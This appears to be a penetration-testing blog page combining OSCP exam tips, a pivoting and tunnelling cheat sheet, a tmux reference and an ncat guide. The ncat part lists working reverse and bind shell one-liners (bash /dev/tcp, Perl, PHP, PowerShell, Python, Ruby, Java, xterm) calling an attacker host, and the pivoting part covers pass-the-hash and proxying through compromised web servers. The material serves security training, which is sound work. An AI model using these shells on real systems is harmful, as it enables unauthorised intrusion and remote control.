Detalhes
Categoria: Artigos

If you are somewhat unfamiliar with these basics, here are some links to help you learn the required materials:

Practice:

Now that you have a fundamental understanding of the basics, you need to practice… a lot! If are pretty new to Penetration Testing and think that taking the OSCP will teach you - then you are dead wrong! You need a lot of previous training and experience to even attempt something like the OSCP.

The following materials below will help you take the first steps into Penetration Testing, and for those who are already experienced, it will help you practice and expand your skills.

I know that there is a ton of material here, and it might seem overwhelming at first - but do know that much of these topics overlap each other once you begin studying offensive security. Remember, it takes time to learn - you need to enjoy the process of learning, or you will never get to your end goal! Take it slow, start with the basics, and work your way up.

Exam Tips:

As with everything, there are always certain things that you should know and be doing during the PWK Lab and OSCP Exam, these following tips should help you stay on focus and to stray away from rabbit holes.

  1. Enumerate, Enumerate, Enumerate!
  2. Simple Nmap Scans w/ Script Scanning are your friends!
    • TCP: nmap -sS -sV -sC -n [IP]
    • UDP: nmap -sU -sV -n --top-ports 200 [IP]
  3. Enumerate SNMP (UDP 161) if it’s open!
    • snmp-check -t [IP] -c public
    • This will show other open ports/running services and applications!
  4. Enumerate SMB (TCP 139/TCP 445) if it’s open!
    • enum4linux [IP]
    • This will show open shares, anonymous logins, etc.
  5. Run nikto on interesting directories!
    • nikto -h http(s)://[IP]:[PORT]/[DIRECTORY]
  6. DirBuster over dirb. Opt for using the medium wordlist for better results!
    • /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  7. Check for anonymous logins for FTP/SMB!
    • ftp [IP]
      • Username: anonymous Password: anonymous
    • smbclient -L \\[IP]
      • Username: root Password: None
  8. Check for WebDav! Nmap script scan should pick it up! If not…
    • davtest -url http(s)://[IP]
  9. Don’t overthink it! Try low hanging fruit first!
    • Password the same as Username?
    • Username/Password combo of admin:admin?
    • Google the Documentation. Default Credentials/Login?
  10. Rotate machines every 3-4 hours. Don’t tire yourself out!
  11. Have an idea? But it seem impossible? Try it… you never know! =)
  12. Take frequent breaks. Opt for 10 minute break every 2 hours.
  13. Eat and drink! Make time for Lunch, and Dinner. Your brain needs food to function.
  14. Limit caffeine intake, 1-2 cups of coffee is okay! But, drink Tea and Water.
  15. Don’t have any snacks next to you. If you’re hungry, walk to the kitchen for a snack, this will make you walk away from your PC and will help clear your mind.
  16. Breath… relax… you got 24 hours!
  17. Organize your notes, take screenshots, and document everything!
  18. A few days before the exam create and edit your report outline.
  19. In the PWK Lab, practice the Buffer Overflows till you can do them by heart and without notes.
  20. Don’t give up to easily, and most importantly… “Try Harder!”.

Detalhes
Categoria: Artigos

Basic Pivoting Types

TypeUse Case
Listen - Listen Exposed asset, may not want to connect out.
Listen - Connect Normal redirect.
Connect - Connect Can’t bind, so connect to bridge two hosts

Listen - Listen

Netcat - Pivot Host

ncat -v -l -p 8080 -c "ncat -v -l -p 9090"

Socat - Pivot Host

socat -v tcp-listen:8080 tcp-listen:9090

Remote host 1

We connect to the first side of the listen->listen trigger and send the file as input.

ncat localhost 8080 < file

Remote host 2

We connect to the second side of the listen->listen trigger and write the output to disk.

ncat localhost 9090 > newfile

Listen - Connect

Netcat - Pivot Host

ncat -l -v -p 8080 -c "ncat localhost 9090"

Socat - Pivot Host

socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090

Remote host 1

We connect to the listen side of the listen->connect trigger and send file as input.

ncat localhost -p 8080 < file

Remote host 2

We wait and listen for the connect from the listen->connect trigger and write the file to disk.

ncat -l -p 9090 > newfile

Connect - Connect

Netcat - Pivot Host

Remote host listeners must be bound first.

ncat localhost 8080 -c "ncat localhost 9090"

Socat - Pivot Host

Remote host listeners must be bound first.

socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090

Remote Host 1

We bind and listen to port 8080 and send the file as input.

ncat -l -p 8080 < file

Remote Host 2

We bind and listen to port 9090 and write the data to disk.

ncat -l -p 9090 > newfile

SSH Tunnels

Dynamic SOCKS Proxy

This can be used with proxychains to forward client traffic through the remote server.

ssh -D8080 [user]@[host]

Local Port Forwarding

This will bind to [bindaddr]:[port] on the client and forward through the SSH server to the [dsthost]:[dstport]

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

This will bind to [bindaddr]:[port] on the remote server and tunnel traffic through the ssh client side to [localhost]:[localport]

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Establish VPN over SSH The following options must be enabled on the server side.

PermitRootLogin yes
PermitTunnel yes

ssh [user]@[host] -w any:any

You can see the established tun interface by typing ifconfig -a

The interfaces and forwarding must still be configured. This assumes that we are going to forward 10.0.0.0/24 through the remote server. We are also assuming that the server’s main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections.

Client

ip addr add 192.168.5.2/32 peer 192.168.5.1 dev tun0
# Once Server is setup, run the following to add routes
route add -net 10.0.0.0/24 gw 192.168.5.1

Server

ip addr add 192.168.5.1/32 peer 192.168.5.2 dev tun0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -s 192.168.5.1 -o eth0 -j MASQUERADE

Proxychains

The configuration file in /etc/proxychains.conf must be edited to point towards your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.

[ProxyList]
socks4 localhost 8080

Now, in order to run any type of network through the proxy just run it like so. Remember, you can’t run any raw socket scans through a SOCKS4 proxy. You need to setup an SSH VPN tunnel or something similar for that type of functionality.

proxychains nmap 192.168.5.6

Web Shell SOCKSProxy (reGeorg)

reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx,asph,jsp, or php. Simply upload the desired file to the webserver.

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

You are now free to use your regular tools using proxychains.

Meterpreter

Meterpreter allows you to create pivoting routes within the framework for use with any of the builtin modules. To automatically route, just use the following.

run autoroute -s 192.168.5.1/24

To print routes

run autoroute -p

Meterpreter - SOCKS Proxy

Now you can run other tools through Meterpreter using proxychains.

use auxiliary/server/socks4a
set SRVPORT 8080
run

Forward single ports

Below will forward rdesktop sessions from localhost port 3389 to the target 192.168.5.9 through Meterpreter as a tunnel.

portfwd add -L 127.0.0.1 -l 3389 -r 192.168.5.9 -p 3389

Rpivot

Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -D option, but it works in the reverse order.

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

The Server will now have a SOCKS proxy on port 1080 that will forward traffic through the [client].

Through corporate proxy

Rpivot also works through corporate proxies.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

If you prefer passing the hash, then you’re also in luck.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

AutoSSH

AutoSSH is a tool that allows you to automatically restart SSH sessions and tunnels. The following line will open port 2222 on host attacker and tunnel it to the compromised host on port 22. You would then be able to setup a dynamic SSH SOCKS proxy and connect to localhost:2222 and be able to forward through the compromised host as normal.

autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]

References

  1. Red Team Pivoting Guide
  2. Proxy Chains
  3. rpivot
  4. reGeorg
  5. Metasploit
  6. Red Team Field Manual

Detalhes
Categoria: Artigos

Command line

  • tmux new -s {session_name} -n {name} - create new session and specify window name
  • tmux {attach|a|at} -t {session_name} - attach to session
  • tmux ls - list sessions
  • tmux kill-session -t {session_name} - kill session

Misc

  • Prefix ? - help
  • Prefix d - detach
  • Prefix t - big clock

Command mode

  • Prefix : - command mode
  • new-window -n {name} {command} - create new window and execute command

Sessions

  • :new - new session
  • Prefix s - list sessions
  • Prefix $ - name session
  • Prefix ( - previous session
  • Prefix ) - next session
  • Prefix L - last session

Windows

  • Prefix c - create new window
  • Prefix , - rename window
  • Prefix n - next window
  • Prefix p - previous window
  • Prefix {n} - go to window n
  • Prefix f - find window by name
  • Prefix w - list windows
  • Prefix & - kill window

Panes

  • Prefix % split panes by vertical (see tmux-pain-control)
  • Prefix " split panes by horizontal (see tmux-pain-control)
  • Prefix o - cycle through the panes
  • Prefix {arrow key} - navigate to specific pane (see tmux-pain-control)
  • Prefix space - cycle thought layouts
  • Prefix x - close pane
  • Prefix q - show panes numbers
  • Prefix z - switch to whole window mode and back
  • Prefix { - move the current pane left (see tmux-pain-control)
  • Prefix } - move the current pane right (see tmux-pain-control)
  • :setw synchronize-panes - toggle panes synchronization

Copy mode (vi mode)

  • Prefix [ - start copy mode
  • Prefix ] - past from copy mode
  • ^ - back to indentation
  • esc - clear selection
  • enter - copy selection
  • j - cursor down
  • h - cursor left
  • l - cursor right
  • k - cursor down
  • L - cursor to bottom line
  • M - cursor to middle line
  • H - cursor to top line
  • d - delete entire line
  • D - delete to end of line
  • $ - end of line
  • : - goto line
  • ⌃-d - half page down
  • ⌃-u - half page up
  • ⌃-f - next page
  • w - next word
  • p - paste buffer
  • ⌃-b - previous page
  • b - previous word
  • q - quit mode
  • ⌃-down, ⌃-j - scroll down
  • ⌃-up, ⌃-k - scroll up
  • n - next search match
  • ? - search backward
  • / - search forward
  • 0 - start of line
  • space - start selection

Settings

  • set -g mode-mouse on - enable mouse support

Plugins

tmux-copycat

https://github.com/tmux-plugins/tmux-copycat

  • prefix + / - regex search (strings work too)

Predefined searches

  • prefix + ctrl-f - simple file search
  • prefix + ctrl-g - jumping over git status files (best used after git status command)
  • prefix + alt-h - jumping over SHA-1 hashes (best used after git log command)
  • prefix + ctrl-u - url search (http, ftp and git urls)
  • prefix + ctrl-d - number search (mnemonic d, as digit)
  • prefix + alt-i - ip address search

tmux-open

https://github.com/tmux-plugins/tmux-open

  • o - “open” a highlighted selection with the system default program. open for OS X or xdg-open for Linux.
  • ⌃-o - open a highlighted selection with the $EDITOR

tmux-pain-control

https://github.com/tmux-plugins/tmux-pain-control

  • Prefix + h, Prefix + C-h - select pane on the left
  • Prefix + j, Prefix + C-j - select pane below the current one
  • Prefix + k, Prefix + C-k - select pane above
  • Prefix + l, Prefix + C-l - select pane on the right

Resizing

  • Prefix + shift + h - resize current pane 5 cells to the left
  • Prefix + shift + j - resize 5 cells in the up direction
  • Prefix + shift + k - resize 5 cells in the down direction
  • Prefix + shift + l - resize 5 cells to the right

Splitting

  • Prefix | split panes by vertical
  • Prefix - split panes by horizontal

Swapping panes

  • Prefix < moves current pane one position to the left
  • Prefix > moves current pane one position to the right

tmux-resurrect

https://github.com/tmux-plugins/tmux-resurrect

  • Prefix ⌃-s - save
  • Prefix ⌃-r - restore

tmux-yank

https://github.com/tmux-plugins/tmux-yank

  • Prefix - y - copies text from the command line to clipboard

copy mode

  • y - copy selection to system clipboard
  • Y - copy selection and paste it to the command line

vim-tmux-navigator

https://github.com/christoomey/vim-tmux-navigator

  • ⌃-h - Left
  • ⌃-j - Down
  • ⌃-k - Up
  • ⌃-l - Right
  • ⌃-\ - Previous split

tmuxinator

https://github.com/tmuxinator/tmuxinator

tmux-sensible

https://github.com/tmux-plugins/tmux-sensible

tpm

https://github.com/tmux-plugins/tpm

Have feedback or questions? Looking for consultation?

My expertise: MongoDB, ElasticSearch, Splunk, and other databases. Docker, Kubernetes. Logging, Metrics. Performance, memory leaks.

Send me an email to O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo..

The content on this site represents my own personal opinions and thoughts at the time of posting.

Content licensed under the Creative Commons CC BY 4.0.

Detalhes
Categoria: Artigos

Man Page

Name
ncat — Concatenate and redirect sockets

Synopsis
ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

 

 

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 80

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://bitrot.sh/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

 

 

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat bitrot.sh 443 --ssl

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">
...

 

 

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

 

 

Once the ncat command is running navigate to web browser and point it to localhost.

Accept multiple requests

ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"

A Better HTTP Server

There’s a neat Lua script that takes advantage of ncat’s ability to interact with the language. The script can be found here. Try saving it to /tmp/httpd.lua

Navigate to a directory with .html files in it, and run the following command.

ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open

Unwrap SSL Connections

Server

Listen on port 6666 as a plain text server. Upon connection, connect to api.ipify.org:443 using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.

ncat -l -p 6666 -c 'ncat --ssl api.ipify.org 443' --keep-open -o out.log

Client

Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to api.ipify.org:443 using SSL.

curl 'http://localhost:6666?format=json' -H 'Host: api.ipify.org'

Connect two incoming connections

ncat -l -p 8080 -c 'ncat -l -p 9090'

Connect two listening servers

This can have some very interesting results.

ncat localhost 8080 -c 'ncat localhost 9090'

For more, check out our pivoting cheatsheet.

Telnet

ncat -t 192.168.1.1 23

Simple Chat

Server

ncat -l 1234 --chat

Client(s)

ncat localhost 1234

Copy Files with UDP

Server

ncat -l 6666 --udp

Client

ncat -udp localhost 6666 < stuff.py

Access Controls

Whitelist IPs

ncat -l -p 8080 --allow 192.168.1.1

Whitelist from file

Hosts should be separated by new lines

ncat -l -p 8080 --allowfile hosts

Blacklist IPs

ncat -l -p 8080 --deny 192.168.1.1,10.10.0.1

Blacklist IPs from file

Hosts should be separated by new lines

ncat -l -p 8080 --denyfile hosts

File Transfer with SSL

Reverse file transfer to attacker

Attacker

ncat -l -p 6666 --ssl > outputfile

Victim

ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat

File send w/ Sender listening

Attacker

ncat -l -ssl -p 6666 --send-only < /bin/ncat

Victim

ncat localhost 6666 --ssl > outputfile

Bind Shell

Linux

ncat -l 6666 -e /bin/sh

Windows

ncat -l 6666 -e cmd

Reverse Shell

Victim

ncat <attacker ip address> 6666 -e /bin/sh

Attacker

ncat -l -p 6666

Victim machine doesn’t have ncat?

Bash

bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

php -r '$sock=fsockopen("10.0.0.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Python 2.7 and 3

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 6666

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

 

 

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.

allowed_users=anybody

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest -ac :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Resources

http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/Snifer/security-cheatsheets/blob/master/reverse-shell

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellUdpOneLine.ps1

  1. Tcpdump usage examples
  2. Using Netcat for File Transfers
  3. Brute Forcing smtp with Hydra
  4. This OVF package requires unsupported hardware
  • Você está aqui:  
  • Pagina Principal